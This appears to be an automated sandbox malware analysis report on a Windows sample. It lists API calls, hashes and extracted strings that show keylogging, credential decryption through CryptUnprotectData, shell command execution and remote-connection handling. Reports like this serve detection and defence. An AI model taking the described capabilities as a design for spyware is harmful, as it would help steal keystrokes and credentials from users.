                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID:
                                • API String ID: 1356121797-0
                                • Opcode ID: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
                                • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                • Opcode Fuzzy Hash: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
                                • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                • _free.LIBCMT ref: 0044C59F
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                • int.LIBCPMT ref: 0040FBE8
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID:
                                • API String ID: 2536120697-0
                                • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                • _free.LIBCMT ref: 004457E3
                                • _free.LIBCMT ref: 0044580A
                                • SetLastError.KERNEL32(00000000), ref: 00445817
                                • SetLastError.KERNEL32(00000000), ref: 00445820
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                APIs
                                • _free.LIBCMT ref: 0044DBB4
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044DBC6
                                • _free.LIBCMT ref: 0044DBD8
                                • _free.LIBCMT ref: 0044DBEA
                                • _free.LIBCMT ref: 0044DBFC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]
                                • API String ID: 3554306468-4262303796
                                • Opcode ID: c7527defe273b290db240a15dfeac0d87092dab51f9164a669b9141c63326ccc
                                • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                • Opcode Fuzzy Hash: c7527defe273b290db240a15dfeac0d87092dab51f9164a669b9141c63326ccc
                                • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: f56d5a069b9674fe497883c128baf58696cbd842302250d7bf008ed8ad4f4277
                                • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                • Opcode Fuzzy Hash: f56d5a069b9674fe497883c128baf58696cbd842302250d7bf008ed8ad4f4277
                                • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                APIs
                                • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: Connection KeepAlive | Enabled | Timeout: $T/F
                                • API String ID: 481472006-155447768
                                • Opcode ID: d3af403f1385e2d01355aa12c50cf574904688da40660193f08fbb313c76cbf4
                                • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                • Opcode Fuzzy Hash: d3af403f1385e2d01355aa12c50cf574904688da40660193f08fbb313c76cbf4
                                • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: 0]T$XF
                                • API String ID: 269201875-3407208694
                                • Opcode ID: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
                                • Instruction ID: 29f128b94e4315e8473d4fe5e2203e9150e620d95e20f300bbe5d6479d49c613
                                • Opcode Fuzzy Hash: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
                                • Instruction Fuzzy Hash: FD11B4B1A402005EE7205F2ABC45B5632946F54734F165A37F9A0EB3E0F3B8C8854B8B
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: b5fe0f5e80e9a9d7d9742089a16902ed0dc4484d36424d395f683e812b7c9929
                                • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                • Opcode Fuzzy Hash: b5fe0f5e80e9a9d7d9742089a16902ed0dc4484d36424d395f683e812b7c9929
                                • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00452FD6,00000000), ref: 0044815D
                                • GetLastError.KERNEL32(?,00000000,?,00452FD6,00000000), ref: 00448167
                                • __dosmaperr.LIBCMT ref: 00448192
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID: IT
                                • API String ID: 2583163307-2326920787
                                • Opcode ID: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
                                • Instruction ID: bc407199021615a177a746a92b253f91ed1213c20eb266450d42f323bf4fb8fa
                                • Opcode Fuzzy Hash: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
                                • Instruction Fuzzy Hash: 05014932A011641AF7247375A845B7F67494B81778F26026FFD0D8B2E2DF6C8C83815D
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: P0F$alarm.wav$x(G
                                • API String ID: 1174141254-3464520750
                                • Opcode ID: 9aa17c110c8bf40cab32959b0a671c41a4b05bcb2b2dcf8c9d3bf8259e27c33c
                                • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                • Opcode Fuzzy Hash: 9aa17c110c8bf40cab32959b0a671c41a4b05bcb2b2dcf8c9d3bf8259e27c33c
                                • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                • CloseHandle.KERNEL32(?), ref: 004051AA
                                • SetEvent.KERNEL32(?), ref: 004051B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 92c3ac276b95bb479ae6f24dc06d48f0034506e05dd6b0855473c86a9f9fecf8
                                • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                • Opcode Fuzzy Hash: 92c3ac276b95bb479ae6f24dc06d48f0034506e05dd6b0855473c86a9f9fecf8
                                • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • _abort.LIBCMT ref: 0044C289
                                • _free.LIBCMT ref: 0044C2BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_abort_free
                                • String ID: pF$KS
                                • API String ID: 289325740-4051209147
                                • Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                • Instruction ID: 681b650f5022ba5d363f9e5fe3477a26ea07511fc4476d54e9c473318faef7cf
                                • Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                • Instruction Fuzzy Hash: 2701CC75D02A319BE7B19F9A944165AB760BF04710B1D025BF96473381D7FC29418FCD
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: b351c3cfc9a326bb6df570b2850a33e4d7494764cb46b01087834d94efe21cf7
                                • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                • Opcode Fuzzy Hash: b351c3cfc9a326bb6df570b2850a33e4d7494764cb46b01087834d94efe21cf7
                                • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
